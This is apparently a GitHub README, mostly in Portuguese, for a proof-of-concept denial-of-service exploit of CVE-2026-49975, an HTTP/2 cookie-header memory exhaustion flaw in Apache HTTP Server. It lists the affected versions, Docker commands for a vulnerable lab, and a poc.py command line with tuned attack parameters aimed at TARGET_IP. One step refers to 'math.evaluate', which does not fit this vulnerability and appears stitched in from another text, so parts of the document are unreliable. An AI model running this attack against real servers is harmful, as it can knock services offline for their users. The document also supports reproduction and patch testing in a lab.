
HTTP/2 Bomb
★ CVE-2026-49975 HTTP/2 Bomb PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975 é uma vulnerabilidade de Negação de Serviço (DoS) no Apache HTTP Server. A vulnerabilidade ocorre no caminho de tratamento de requisições HTTP/2, onde múltiplos campos de cabeçalho
cookiepodem ser mesclados sem serem contados adequadamente contraLimitRequestFields. Ao enviar uma pequena requisição HTTP/2 codificada em HPACK que se expande em muitos campos de cabeçalhocookie, um atacante pode forçar o servidor a alocar memória repetidamente durante a mesclagem do cabeçalho Cookie. O atacante pode então usar o controle de fluxo HTTP/2 para atrasar a transmissão da resposta, mantendo os fluxos afetados abertos e impedindo que a memória alocada seja liberada.
| Categoria | Versão |
|---|---|
| Vulnerável | Apache HTTP Server 2.4.17 ≤ versão ≤ 2.4.67 |
| Corrigida | Apache HTTP Server 2.4.68 ou posterior |
Build and run the vulnerable Apache HTTP Server environment.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
Após iniciar o ambiente vulnerável, siga os passos abaixo para reproduzir o ataque.
docker stats cve-2026-49975
Example output:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
Envie a seguinte expressão para math.evaluate (por exemplo, através da entrada de cálculo da aplicação).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Verifique se o uso de memória do contêiner Apache aumenta e permanece alto enquanto os fluxos de ataque são mantidos abertos.